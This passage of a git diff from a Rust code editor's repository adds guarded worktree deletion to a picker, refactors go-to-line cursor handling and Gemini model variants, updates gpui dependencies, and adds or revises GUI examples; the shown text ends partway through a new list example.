@@ -103,6 +117,7 @@ impl WorktreeList { this.picker.update(cx, |picker, cx| { picker.delegate.all_worktrees = Some(all_worktrees); picker.delegate.default_branch = default_branch; + picker.delegate.refresh_forbidden_deletion_path(cx); picker.refresh(window, cx); }) })?; @@ -173,7 +188,7 @@ impl WorktreeList { return; } picker.delegate.create_worktree( - entry.worktree.branch(), + entry.worktree.display_name(), replace_current_window, Some(default_branch.into()), window, @@ -181,6 +196,19 @@ impl WorktreeList { ); }) } + + pub fn handle_delete( + &mut self, + _: &DeleteWorktree, + window: &mut Window, + cx: &mut Context, + ) { + self.picker.update(cx, |picker, cx| { + picker + .delegate + .delete_at(picker.delegate.selected_index, window, cx) + }) + } } impl ModalView for WorktreeList {} impl EventEmitter for WorktreeList {} @@ -203,6 +231,9 @@ impl Render for WorktreeList { .on_action(cx.listener(|this, _: &WorktreeFromDefaultOnWindow, w, cx| { this.handle_new_worktree(true, w, cx) })) + .on_action(cx.listener(|this, _: &DeleteWorktree, window, cx| { + this.handle_delete(&DeleteWorktree, window, cx) + })) .child(self.picker.clone()) .when(!self.embedded, |el| { el.on_mouse_down_out({ @@ -223,6 +254,14 @@ struct WorktreeEntry { is_new: bool, } +impl WorktreeEntry { + fn can_delete(&self, forbidden_deletion_path: Option<&PathBuf>) -> bool { + !self.is_new + && !self.worktree.is_main + && forbidden_deletion_path != Some(&self.worktree.path) + } +} + pub struct WorktreeListDelegate { matches: Vec, all_worktrees: Option>, @@ -233,6 +272,7 @@ pub struct WorktreeListDelegate { modifiers: Modifiers, focus_handle: FocusHandle, default_branch: Option, + forbidden_deletion_path: Option, } impl WorktreeListDelegate { @@ -252,6 +292,7 @@ impl WorktreeListDelegate { modifiers: Default::default(), focus_handle: cx.focus_handle(), default_branch: None, + forbidden_deletion_path: None, } } @@ -275,11 +316,10 @@ impl WorktreeListDelegate { .git .worktree_directory .clone(); - let 
work_dir = repo.work_directory_abs_path.clone(); - let directory = - validate_worktree_directory(&work_dir, &worktree_directory_setting)?; - let new_worktree_path = directory.join(&branch); - let receiver = repo.create_worktree(branch.clone(), directory, commit); + let new_worktree_path = + repo.path_for_new_linked_worktree(&branch, &worktree_directory_setting)?; + let receiver = + repo.create_worktree(branch.clone(), new_worktree_path.clone(), commit); anyhow::Ok((receiver, new_worktree_path)) })?; receiver.await??; @@ -324,7 +364,7 @@ impl WorktreeListDelegate { workspace .update_in(cx, |workspace, window, cx| { workspace.open_workspace_for_paths( - replace_current_window, + OpenMode::Activate, vec![new_worktree_path], window, cx, @@ -377,10 +417,15 @@ impl WorktreeListDelegate { else { return; }; + let open_mode = if replace_current_window { + OpenMode::Activate + } else { + OpenMode::NewWindow + }; if is_local { let open_task = workspace.update(cx, |workspace, cx| { - workspace.open_workspace_for_paths(replace_current_window, vec![path], window, cx) + workspace.open_workspace_for_paths(open_mode, vec![path], window, cx) }); cx.spawn(async move |_, _| { open_task?.await?; @@ -420,6 +465,81 @@ impl WorktreeListDelegate { .as_ref() .and_then(|repo| repo.read(cx).branch.as_ref().map(|b| b.name())) } + + fn delete_at(&self, idx: usize, window: &mut Window, cx: &mut Context>) { + let Some(entry) = self.matches.get(idx).cloned() else { + return; + }; + if !entry.can_delete(self.forbidden_deletion_path.as_ref()) { + return; + } + let Some(repo) = self.repo.clone() else { + return; + }; + let workspace = self.workspace.clone(); + let path = entry.worktree.path; + + cx.spawn_in(window, async move |picker, cx| { + let result = repo + .update(cx, |repo, _| repo.remove_worktree(path.clone(), false)) + .await?; + + if let Err(e) = result { + log::error!("Failed to remove worktree: {}", e); + if let Some(workspace) = workspace.upgrade() { + cx.update(|_window, cx| { + 
show_error_toast( + workspace, + format!("worktree remove {}", path.display()), + e, + cx, + ) + })?; + } + return Ok(()); + } + + picker.update_in(cx, |picker, _, cx| { + picker.delegate.matches.retain(|e| e.worktree.path != path); + if let Some(all_worktrees) = &mut picker.delegate.all_worktrees { + all_worktrees.retain(|w| w.path != path); + } + picker.delegate.refresh_forbidden_deletion_path(cx); + if picker.delegate.matches.is_empty() { + picker.delegate.selected_index = 0; + } else if picker.delegate.selected_index >= picker.delegate.matches.len() { + picker.delegate.selected_index = picker.delegate.matches.len() - 1; + } + cx.notify(); + })?; + + anyhow::Ok(()) + }) + .detach(); + } + + fn refresh_forbidden_deletion_path(&mut self, cx: &App) { + let Some(workspace) = self.workspace.upgrade() else { + debug_panic!("Workspace should always be available or else the picker would be closed"); + self.forbidden_deletion_path = None; + return; + }; + + let visible_worktree_paths = workspace.read_with(cx, |workspace, cx| { + workspace + .project() + .read(cx) + .visible_worktrees(cx) + .map(|worktree| worktree.read(cx).abs_path().to_path_buf()) + .collect::>() + }); + + self.forbidden_deletion_path = if visible_worktree_paths.len() == 1 { + visible_worktree_paths.into_iter().next() + } else { + None + }; + } } async fn open_remote_worktree( @@ -574,7 +694,7 @@ impl PickerDelegate for WorktreeListDelegate { let candidates = all_worktrees .iter() .enumerate() - .map(|(ix, worktree)| StringMatchCandidate::new(ix, worktree.branch())) + .map(|(ix, worktree)| StringMatchCandidate::new(ix, worktree.display_name())) .collect::>(); fuzzy::match_strings( &candidates, @@ -599,14 +719,15 @@ impl PickerDelegate for WorktreeListDelegate { if !query.is_empty() && !matches .first() - .is_some_and(|entry| entry.worktree.branch() == query) + .is_some_and(|entry| entry.worktree.display_name() == query) { let query = query.replace(' ', "-"); matches.push(WorktreeEntry { worktree: 
GitWorktree { path: Default::default(), - ref_name: format!("refs/heads/{query}").into(), + ref_name: Some(format!("refs/heads/{query}").into()), sha: Default::default(), + is_main: false, }, positions: Vec::new(), is_new: true, @@ -631,9 +752,9 @@ impl PickerDelegate for WorktreeListDelegate { return; }; if entry.is_new { - self.create_worktree(&entry.worktree.branch(), secondary, None, window, cx); + self.create_worktree(&entry.worktree.display_name(), secondary, None, window, cx); } else { - self.open_worktree(&entry.worktree.path, secondary, window, cx); + self.open_worktree(&entry.worktree.path, !secondary, window, cx); } cx.emit(DismissEvent); @@ -662,16 +783,19 @@ impl PickerDelegate for WorktreeListDelegate { let (branch_name, sublabel) = if entry.is_new { ( - Label::new(format!("Create Worktree: \"{}\"…", entry.worktree.branch())) - .truncate() - .into_any_element(), + Label::new(format!( + "Create Worktree: \"{}\"…", + entry.worktree.display_name() + )) + .truncate() + .into_any_element(), format!( "based off {}", self.base_branch(cx).unwrap_or("the current branch") ), ) } else { - let branch = entry.worktree.branch(); + let branch = entry.worktree.display_name(); let branch_first_line = branch.lines().next().unwrap_or(branch); let positions: Vec<_> = entry .positions @@ -688,38 +812,103 @@ impl PickerDelegate for WorktreeListDelegate { ) }; + let focus_handle = self.focus_handle.clone(); + + let can_delete = entry.can_delete(self.forbidden_deletion_path.as_ref()); + + let delete_button = |entry_ix: usize| { + IconButton::new(("delete-worktree", entry_ix), IconName::Trash) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in("Delete Worktree", &DeleteWorktree, &focus_handle, cx) + }) + .on_click(cx.listener(move |this, _, window, cx| { + this.delegate.delete_at(entry_ix, window, cx); + })) + }; + + let entry_icon = if entry.is_new { + IconName::Plus + } else { + IconName::GitWorktree + }; + Some( 
ListItem::new(format!("worktree-menu-{ix}")) .inset(true) .spacing(ListItemSpacing::Sparse) .toggle_state(selected) .child( - v_flex() + h_flex() .w_full() + .gap_2p5() .child( - h_flex() - .gap_2() - .justify_between() - .overflow_x_hidden() - .child(branch_name) - .when(!entry.is_new, |this| { - this.child( - Label::new(sha) - .size(LabelSize::Small) - .color(Color::Muted) - .buffer_font(cx) - .into_element(), - ) - }), - ) - .child( - Label::new(sublabel) - .size(LabelSize::Small) + Icon::new(entry_icon) .color(Color::Muted) - .truncate() - .into_any_element(), - ), - ), + .size(IconSize::Small), + ) + .child(v_flex().w_full().child(branch_name).map(|this| { + if entry.is_new { + this.child( + Label::new(sublabel) + .size(LabelSize::Small) + .color(Color::Muted) + .truncate(), + ) + } else { + this.child( + h_flex() + .w_full() + .min_w_0() + .gap_1p5() + .child( + Label::new(sha) + .size(LabelSize::Small) + .color(Color::Muted), + ) + .child( + Label::new("•") + .alpha(0.5) + .color(Color::Muted) + .size(LabelSize::Small), + ) + .child( + Label::new(sublabel) + .truncate() + .color(Color::Muted) + .size(LabelSize::Small) + .flex_1(), + ) + .into_any_element(), + ) + } + })), + ) + .when(!entry.is_new, |this| { + let focus_handle = self.focus_handle.clone(); + let open_in_new_window_button = + IconButton::new(("open-new-window", ix), IconName::ArrowUpRight) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in( + "Open in New Window", + &menu::SecondaryConfirm, + &focus_handle, + cx, + ) + }) + .on_click(|_, window, cx| { + window.dispatch_action(menu::SecondaryConfirm.boxed_clone(), cx); + }); + + this.end_slot( + h_flex() + .gap_0p5() + .child(open_in_new_window_button) + .when(can_delete, |this| this.child(delete_button(ix))), + ) + .show_end_slot_on_hover() + }), ) } @@ -731,6 +920,8 @@ impl PickerDelegate for WorktreeListDelegate { let focus_handle = self.focus_handle.clone(); let selected_entry = 
self.matches.get(self.selected_index); let is_creating = selected_entry.is_some_and(|entry| entry.is_new); + let can_delete = selected_entry + .is_some_and(|entry| entry.can_delete(self.forbidden_deletion_path.as_ref())); let footer_container = h_flex() .w_full() @@ -778,18 +969,20 @@ impl PickerDelegate for WorktreeListDelegate { } else { Some( footer_container + .when(can_delete, |this| { + this.child( + Button::new("delete-worktree", "Delete") + .key_binding( + KeyBinding::for_action_in(&DeleteWorktree, &focus_handle, cx) + .map(|kb| kb.size(rems_from_px(12.))), + ) + .on_click(|_, window, cx| { + window.dispatch_action(DeleteWorktree.boxed_clone(), cx) + }), + ) + }) .child( Button::new("open-in-new-window", "Open in New Window") - .key_binding( - KeyBinding::for_action_in(&menu::Confirm, &focus_handle, cx) - .map(|kb| kb.size(rems_from_px(12.))), - ) - .on_click(|_, window, cx| { - window.dispatch_action(menu::Confirm.boxed_clone(), cx) - }), - ) - .child( - Button::new("open-in-window", "Open") .key_binding( KeyBinding::for_action_in( &menu::SecondaryConfirm, @@ -802,6 +995,16 @@ impl PickerDelegate for WorktreeListDelegate { window.dispatch_action(menu::SecondaryConfirm.boxed_clone(), cx) }), ) + .child( + Button::new("open-in-window", "Open") + .key_binding( + KeyBinding::for_action_in(&menu::Confirm, &focus_handle, cx) + .map(|kb| kb.size(rems_from_px(12.))), + ) + .on_click(|_, window, cx| { + window.dispatch_action(menu::Confirm.boxed_clone(), cx) + }), + ) .into_any(), ) } diff --git a/crates/go_to_line/Cargo.toml b/crates/go_to_line/Cargo.toml index 0260cd2d122f83f2c11505be9e6e8a84f69f8569..c07656985380c93355a4c8429dcf1135acf93d56 100644 --- a/crates/go_to_line/Cargo.toml +++ b/crates/go_to_line/Cargo.toml @@ -17,6 +17,7 @@ editor.workspace = true gpui.workspace = true language.workspace = true menu.workspace = true +multi_buffer.workspace = true serde.workspace = true settings.workspace = true text.workspace = true @@ -34,6 +35,4 @@ menu.workspace = 
true project = { workspace = true, features = ["test-support"] } rope.workspace = true serde_json.workspace = true -tree-sitter-rust.workspace = true -tree-sitter-typescript.workspace = true workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/go_to_line/src/cursor_position.rs b/crates/go_to_line/src/cursor_position.rs index 042d9a46b6c76a461e60d9002a2362190e253cd4..03bec51ac209fd6e3c254689b3b7caa2695fa450 100644 --- a/crates/go_to_line/src/cursor_position.rs +++ b/crates/go_to_line/src/cursor_position.rs @@ -42,23 +42,22 @@ impl UserCaretPosition { snapshot: &MultiBufferSnapshot, ) -> Self { let selection_end = selection.head(); - let (line, character) = if let Some((buffer_snapshot, point, _)) = - snapshot.point_to_buffer_point(selection_end) - { - let line_start = Point::new(point.row, 0); + let (line, character) = + if let Some((buffer_snapshot, point)) = snapshot.point_to_buffer_point(selection_end) { + let line_start = Point::new(point.row, 0); - let chars_to_last_position = buffer_snapshot - .text_summary_for_range::(line_start..point) - .chars as u32; - (line_start.row, chars_to_last_position) - } else { - let line_start = Point::new(selection_end.row, 0); + let chars_to_last_position = buffer_snapshot + .text_summary_for_range::(line_start..point) + .chars as u32; + (line_start.row, chars_to_last_position) + } else { + let line_start = Point::new(selection_end.row, 0); - let chars_to_last_position = snapshot - .text_summary_for_range::(line_start..selection_end) - .chars as u32; - (selection_end.row, chars_to_last_position) - }; + let chars_to_last_position = snapshot + .text_summary_for_range::(line_start..selection_end) + .chars as u32; + (selection_end.row, chars_to_last_position) + }; Self { line: NonZeroU32::new(line + 1).expect("added 1"), @@ -232,7 +231,7 @@ impl Render for CursorPosition { if let Some(editor) = workspace .active_item(cx) .and_then(|item| item.act_as::(cx)) - && let Some((_, buffer, _)) = 
editor.read(cx).active_excerpt(cx) + && let Some(buffer) = editor.read(cx).active_buffer(cx) { workspace.toggle_modal(window, cx, |window, cx| { crate::GoToLine::new(editor, buffer, window, cx) diff --git a/crates/go_to_line/src/go_to_line.rs b/crates/go_to_line/src/go_to_line.rs index 662bf2a98d84ba434da98aeca71791c028f6018c..561d6a7d31398ab2a8eb74042fc1a617b7159d33 100644 --- a/crates/go_to_line/src/go_to_line.rs +++ b/crates/go_to_line/src/go_to_line.rs @@ -2,7 +2,7 @@ pub mod cursor_position; use cursor_position::UserCaretPosition; use editor::{ - Anchor, Editor, MultiBufferSnapshot, RowHighlightOptions, SelectionEffects, ToOffset, ToPoint, + Anchor, Editor, MultiBufferSnapshot, RowHighlightOptions, SelectionEffects, ToPoint, actions::Tab, scroll::{Autoscroll, ScrollOffset}, }; @@ -11,6 +11,7 @@ use gpui::{ Subscription, div, prelude::*, }; use language::Buffer; +use multi_buffer::MultiBufferRow; use text::{Bias, Point}; use theme::ActiveTheme; use ui::prelude::*; @@ -62,7 +63,7 @@ impl GoToLine { return; }; let editor = editor_handle.read(cx); - let Some((_, buffer, _)) = editor.active_excerpt(cx) else { + let Some(buffer) = editor.active_buffer(cx) else { return; }; workspace.update(cx, |workspace, cx| { @@ -92,9 +93,9 @@ impl GoToLine { let last_line = editor .buffer() .read(cx) - .excerpts_for_buffer(snapshot.remote_id(), cx) - .into_iter() - .map(move |(_, range)| text::ToPoint::to_point(&range.context.end, &snapshot).row) + .snapshot(cx) + .excerpts_for_buffer(snapshot.remote_id()) + .map(move |range| text::ToPoint::to_point(&range.context.end, &snapshot).row) .max() .unwrap_or(0); @@ -226,31 +227,14 @@ impl GoToLine { let row = query_row.saturating_sub(1); let character = query_char.unwrap_or(0).saturating_sub(1); - let start_offset = Point::new(row, 0).to_offset(snapshot); - const MAX_BYTES_IN_UTF_8: u32 = 4; - let max_end_offset = snapshot - .clip_point( - Point::new(row, character * MAX_BYTES_IN_UTF_8 + 1), - Bias::Right, - ) - .to_offset(snapshot); - 
- let mut chars_to_iterate = character; - let mut end_offset = start_offset; - 'outer: for text_chunk in snapshot.text_for_range(start_offset..max_end_offset) { - let mut offset_increment = 0; - for c in text_chunk.chars() { - if chars_to_iterate == 0 { - end_offset += offset_increment; - break 'outer; - } else { - chars_to_iterate -= 1; - offset_increment += c.len_utf8(); - } - } - end_offset += offset_increment; - } - Some(snapshot.anchor_before(snapshot.clip_offset(end_offset, Bias::Left))) + let target_multi_buffer_row = MultiBufferRow(row); + let (buffer_snapshot, target_in_buffer) = snapshot.point_to_buffer_point(Point::new( + target_multi_buffer_row.min(snapshot.max_row()).0, + 0, + ))?; + let target_point = + buffer_snapshot.point_from_external_input(target_in_buffer.row, character); + Some(snapshot.anchor_before(target_point)) } fn relative_line_from_query(&self, cx: &App) -> Option { diff --git a/crates/google_ai/src/google_ai.rs b/crates/google_ai/src/google_ai.rs index 3a686f97a8825b30a8f02f4149b110c3d1aacb1e..7659be8ab44da35efd16389c4abd0bf99d8cf3a4 100644 --- a/crates/google_ai/src/google_ai.rs +++ b/crates/google_ai/src/google_ai.rs @@ -510,11 +510,9 @@ pub enum Model { alias = "gemini-2.5-pro-preview-06-05" )] Gemini25Pro, - #[serde(rename = "gemini-3-pro-preview")] - Gemini3Pro, #[serde(rename = "gemini-3-flash-preview")] Gemini3Flash, - #[serde(rename = "gemini-3.1-pro-preview")] + #[serde(rename = "gemini-3.1-pro-preview", alias = "gemini-3-pro-preview")] Gemini31Pro, #[serde(rename = "custom")] Custom { @@ -537,7 +535,6 @@ impl Model { Self::Gemini25FlashLite => "gemini-2.5-flash-lite", Self::Gemini25Flash => "gemini-2.5-flash", Self::Gemini25Pro => "gemini-2.5-pro", - Self::Gemini3Pro => "gemini-3-pro-preview", Self::Gemini3Flash => "gemini-3-flash-preview", Self::Gemini31Pro => "gemini-3.1-pro-preview", Self::Custom { name, .. 
} => name, @@ -548,7 +545,6 @@ impl Model { Self::Gemini25FlashLite => "gemini-2.5-flash-lite", Self::Gemini25Flash => "gemini-2.5-flash", Self::Gemini25Pro => "gemini-2.5-pro", - Self::Gemini3Pro => "gemini-3-pro-preview", Self::Gemini3Flash => "gemini-3-flash-preview", Self::Gemini31Pro => "gemini-3.1-pro-preview", Self::Custom { name, .. } => name, @@ -560,7 +556,6 @@ impl Model { Self::Gemini25FlashLite => "Gemini 2.5 Flash-Lite", Self::Gemini25Flash => "Gemini 2.5 Flash", Self::Gemini25Pro => "Gemini 2.5 Pro", - Self::Gemini3Pro => "Gemini 3 Pro", Self::Gemini3Flash => "Gemini 3 Flash", Self::Gemini31Pro => "Gemini 3.1 Pro", Self::Custom { @@ -574,7 +569,6 @@ impl Model { Self::Gemini25FlashLite | Self::Gemini25Flash | Self::Gemini25Pro - | Self::Gemini3Pro | Self::Gemini3Flash | Self::Gemini31Pro => 1_048_576, Self::Custom { max_tokens, .. } => *max_tokens, @@ -586,7 +580,6 @@ impl Model { Model::Gemini25FlashLite | Model::Gemini25Flash | Model::Gemini25Pro - | Model::Gemini3Pro | Model::Gemini3Flash | Model::Gemini31Pro => Some(65_536), Model::Custom { .. 
} => None, @@ -603,10 +596,7 @@ impl Model { pub fn mode(&self) -> GoogleModelMode { match self { - Self::Gemini25FlashLite - | Self::Gemini25Flash - | Self::Gemini25Pro - | Self::Gemini3Pro => { + Self::Gemini25FlashLite | Self::Gemini25Flash | Self::Gemini25Pro => { GoogleModelMode::Thinking { // By default these models are set to "auto", so we preserve that behavior // but indicate they are capable of thinking mode diff --git a/crates/gpui/Cargo.toml b/crates/gpui/Cargo.toml index 4bd9510eac1710554f8eec52f22609db31c531ad..915f0fc03e2cc5beaf40c810654724295c41cde8 100644 --- a/crates/gpui/Cargo.toml +++ b/crates/gpui/Cargo.toml @@ -24,6 +24,7 @@ test-support = [ "http_client/test-support", "wayland", "x11", + "proptest", ] inspector = ["gpui_macros/inspector"] leak-detection = ["backtrace"] @@ -64,18 +65,22 @@ num_cpus = "1.13" parking = "2.0.0" parking_lot.workspace = true postage.workspace = true +proptest = { workspace = true, optional = true } chrono.workspace = true profiling.workspace = true rand.workspace = true raw-window-handle = "0.6" +regex.workspace = true refineable.workspace = true scheduler.workspace = true resvg = { version = "0.45.0", default-features = false, features = [ "text", "system-fonts", "memmap-fonts", + "raster-images" ] } usvg = { version = "0.45.0", default-features = false } +ttf-parser = "0.25" util_macros.workspace = true schemars.workspace = true seahash = "4.1" @@ -93,7 +98,6 @@ gpui_util.workspace = true waker-fn = "1.2.0" lyon = "1.0" pin-project = "1.1.10" -circular-buffer.workspace = true spin = "0.10.0" pollster.workspace = true url.workspace = true @@ -142,13 +146,13 @@ windows = { version = "0.61", features = ["Win32_Foundation"] } backtrace.workspace = true collections = { workspace = true, features = ["test-support"] } env_logger.workspace = true -gpui_platform.workspace = true +gpui_platform = { workspace = true, features = ["font-kit"] } +gpui_util = { workspace = true } lyon = { version = "1.0", features = ["extra"] } 
-pretty_assertions.workspace = true +proptest = { workspace = true } rand.workspace = true scheduler = { workspace = true, features = ["test-support"] } -unicode-segmentation.workspace = true -gpui_util = { workspace = true } +unicode-segmentation = { workspace = true } [target.'cfg(not(target_family = "wasm"))'.dev-dependencies] http_client = { workspace = true, features = ["test-support"] } @@ -156,6 +160,7 @@ reqwest_client = { workspace = true, features = ["test-support"] } [target.'cfg(target_family = "wasm")'.dev-dependencies] wasm-bindgen = { workspace = true } +gpui_web.workspace = true [build-dependencies] embed-resource = { version = "3.0", optional = true } @@ -232,6 +237,10 @@ path = "examples/window_shadow.rs" name = "grid_layout" path = "examples/grid_layout.rs" +[[example]] +name = "list_example" +path = "examples/list_example.rs" + [[example]] name = "mouse_pressure" path = "examples/mouse_pressure.rs" diff --git a/crates/gpui/examples/active_state_bug.rs b/crates/gpui/examples/active_state_bug.rs new file mode 100644 index 0000000000000000000000000000000000000000..f767ed27e456ec65858b72a4df89fab65e7fd1f3 --- /dev/null +++ b/crates/gpui/examples/active_state_bug.rs @@ -0,0 +1,47 @@ +/// Click the button — the `.active()` background gets stuck on every other click. +use gpui::*; +use gpui_platform::application; + +struct Example; + +impl Render for Example { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + // Colors from Zed's default dark theme + let bg = hsla(215. / 360., 0.12, 0.15, 1.); + let text = hsla(221. / 360., 0.11, 0.86, 1.); + let hover = hsla(225. / 360., 0.118, 0.267, 1.); + let active = hsla(220. 
/ 360., 0.118, 0.20, 1.); + + div().bg(bg).size_full().p_1().child( + div() + .id("button") + .px_2() + .py_0p5() + .rounded_md() + .text_sm() + .text_color(text) + .hover(|s| s.bg(hover)) + .active(|s| s.bg(active)) + .on_click(|_, _, _| {}) + .child("Click me"), + ) + } +} + +fn main() { + application().run(|cx: &mut App| { + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(Bounds::centered( + None, + size(px(200.), px(60.)), + cx, + ))), + ..Default::default() + }, + |_, cx| cx.new(|_| Example), + ) + .unwrap(); + cx.activate(true); + }); +} diff --git a/crates/gpui/examples/image/image.rs b/crates/gpui/examples/image/image.rs index cf879ba281e18521883222fba54451bb143fae29..45fce26d046c17b716f1644757ef26978f23b6d6 100644 --- a/crates/gpui/examples/image/image.rs +++ b/crates/gpui/examples/image/image.rs @@ -10,7 +10,7 @@ use gpui::{ SharedString, SharedUri, TitlebarOptions, Window, WindowBounds, WindowOptions, actions, div, img, prelude::*, px, rgb, size, }; -use gpui_platform::application; +#[cfg(not(target_family = "wasm"))] use reqwest_client::ReqwestClient; struct Assets { @@ -151,47 +151,64 @@ actions!(image, [Quit]); fn run_example() { let manifest_dir = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - application() - .with_assets(Assets { - base: manifest_dir.join("examples"), - }) - .run(move |cx: &mut App| { + #[cfg(not(target_family = "wasm"))] + let app = gpui_platform::application(); + #[cfg(target_family = "wasm")] + let app = gpui_platform::application(); + app.with_assets(Assets { + base: manifest_dir.join("examples"), + }) + .run(move |cx: &mut App| { + #[cfg(not(target_family = "wasm"))] + { let http_client = ReqwestClient::user_agent("gpui example").unwrap(); cx.set_http_client(Arc::new(http_client)); - - cx.activate(true); - cx.on_action(|_: &Quit, cx| cx.quit()); - cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]); - cx.set_menus(vec![Menu { - name: "Image".into(), - items: vec![MenuItem::action("Quit", Quit)], - 
}]); - - let window_options = WindowOptions { - titlebar: Some(TitlebarOptions { - title: Some(SharedString::from("Image Example")), - appears_transparent: false, - ..Default::default() - }), - - window_bounds: Some(WindowBounds::Windowed(Bounds { - size: size(px(1100.), px(600.)), - origin: Point::new(px(200.), px(200.)), - })), - - ..Default::default() + } + #[cfg(target_family = "wasm")] + { + // Safety: the web examples run single-threaded; the client is + // created and used exclusively on the main thread. + let http_client = unsafe { + gpui_web::FetchHttpClient::with_user_agent("gpui example") + .expect("failed to create FetchHttpClient") }; + cx.set_http_client(Arc::new(http_client)); + } - cx.open_window(window_options, |_, cx| { - cx.new(|_| ImageShowcase { - // Relative path to your root project path - local_resource: manifest_dir.join("examples/image/app-icon.png").into(), - remote_resource: "https://picsum.photos/800/400".into(), - asset_resource: "image/color.svg".into(), - }) + cx.activate(true); + cx.on_action(|_: &Quit, cx| cx.quit()); + cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]); + cx.set_menus(vec![Menu { + name: "Image".into(), + items: vec![MenuItem::action("Quit", Quit)], + disabled: false, + }]); + + let window_options = WindowOptions { + titlebar: Some(TitlebarOptions { + title: Some(SharedString::from("Image Example")), + appears_transparent: false, + ..Default::default() + }), + + window_bounds: Some(WindowBounds::Windowed(Bounds { + size: size(px(1100.), px(600.)), + origin: Point::new(px(200.), px(200.)), + })), + + ..Default::default() + }; + + cx.open_window(window_options, |_, cx| { + cx.new(|_| ImageShowcase { + // Relative path to your root project path + local_resource: manifest_dir.join("examples/image/app-icon.png").into(), + remote_resource: "https://picsum.photos/800/400".into(), + asset_resource: "image/color.svg".into(), }) - .unwrap(); - }); + }) + .unwrap(); + }); } #[cfg(not(target_family = "wasm"))] diff --git 
a/crates/gpui/examples/image_gallery.rs b/crates/gpui/examples/image_gallery.rs index eba3fc0b6444c1b02ed8d6d2437505f1d341e605..bc5cda396c3c37a1ac92bb11abf2f5d57673765e 100644 --- a/crates/gpui/examples/image_gallery.rs +++ b/crates/gpui/examples/image_gallery.rs @@ -7,7 +7,7 @@ use gpui::{ RetainAllImageCache, SharedString, TitlebarOptions, Window, WindowBounds, WindowOptions, actions, div, hash, image_cache, img, prelude::*, px, rgb, size, }; -use gpui_platform::application; +#[cfg(not(target_family = "wasm"))] use reqwest_client::ReqwestClient; use std::{collections::HashMap, sync::Arc}; @@ -248,17 +248,32 @@ impl ImageCache for SimpleLruCache { actions!(image, [Quit]); fn run_example() { - application().run(move |cx: &mut App| { - let http_client = ReqwestClient::user_agent("gpui example").unwrap(); - cx.set_http_client(Arc::new(http_client)); + #[cfg(not(target_family = "wasm"))] + let app = gpui_platform::application(); + #[cfg(target_family = "wasm")] + let app = gpui_platform::single_threaded_web(); + + app.run(move |cx: &mut App| { + #[cfg(not(target_family = "wasm"))] + { + let http_client = ReqwestClient::user_agent("gpui example").unwrap(); + cx.set_http_client(Arc::new(http_client)); + } + #[cfg(target_family = "wasm")] + { + // Safety: the web examples run single-threaded; the client is + // created and used exclusively on the main thread. 
+ let http_client = unsafe { + gpui_web::FetchHttpClient::with_user_agent("gpui example") + .expect("failed to create FetchHttpClient") + }; + cx.set_http_client(Arc::new(http_client)); + } cx.activate(true); cx.on_action(|_: &Quit, cx| cx.quit()); cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]); - cx.set_menus(vec![Menu { - name: "Image Gallery".into(), - items: vec![MenuItem::action("Quit", Quit)], - }]); + cx.set_menus([Menu::new("Image Gallery").items([MenuItem::action("Quit", Quit)])]); let window_options = WindowOptions { titlebar: Some(TitlebarOptions { diff --git a/crates/gpui/examples/input.rs b/crates/gpui/examples/input.rs index d15d791cd008883506389cc7bb16dbad765969c0..370e27de7d54c317af6683c240f343e750c68698 100644 --- a/crates/gpui/examples/input.rs +++ b/crates/gpui/examples/input.rs @@ -85,14 +85,24 @@ impl TextInput { fn backspace(&mut self, _: &Backspace, window: &mut Window, cx: &mut Context) { if self.selected_range.is_empty() { - self.select_to(self.previous_boundary(self.cursor_offset()), cx) + let prev = self.previous_boundary(self.cursor_offset()); + if self.cursor_offset() == prev { + window.play_system_bell(); + return; + } + self.select_to(prev, cx) } self.replace_text_in_range(None, "", window, cx) } fn delete(&mut self, _: &Delete, window: &mut Window, cx: &mut Context) { if self.selected_range.is_empty() { - self.select_to(self.next_boundary(self.cursor_offset()), cx) + let next = self.next_boundary(self.cursor_offset()); + if self.cursor_offset() == next { + window.play_system_bell(); + return; + } + self.select_to(next, cx) } self.replace_text_in_range(None, "", window, cx) } diff --git a/crates/gpui/examples/list_example.rs b/crates/gpui/examples/list_example.rs new file mode 100644 index 0000000000000000000000000000000000000000..7aeff7c24ec3755edf1e37f5ff1cc496c9fb597e --- /dev/null +++ b/crates/gpui/examples/list_example.rs @@ -0,0 +1,170 @@ +#![cfg_attr(target_family = "wasm", no_main)] + +use gpui::{ + App, Bounds, Context, 
ListAlignment, ListState, Render, Window, WindowBounds, WindowOptions, + div, list, prelude::*, px, rgb, size, +}; +use gpui_platform::application; + +const ITEM_COUNT: usize = 40; +const SCROLLBAR_WIDTH: f32 = 12.; + +struct BottomListDemo { + list_state: ListState, +} + +impl BottomListDemo { + fn new() -> Self { + Self { + list_state: ListState::new(ITEM_COUNT, ListAlignment::Bottom, px(500.)).measure_all(), + } + } +} + +impl Render for BottomListDemo { + fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { + let max_offset = self.list_state.max_offset_for_scrollbar().y; + let current_offset = -self.list_state.scroll_px_offset_for_scrollbar().y; + + let viewport_height = self.list_state.viewport_bounds().size.height; + + let raw_fraction = if max_offset > px(0.) { + current_offset / max_offset + } else { + 0. + }; + + let total_height = viewport_height + max_offset; + let thumb_height = if total_height > px(0.) { + px(viewport_height.as_f32() * viewport_height.as_f32() / total_height.as_f32()) + .max(px(30.)) + } else { + px(30.) 
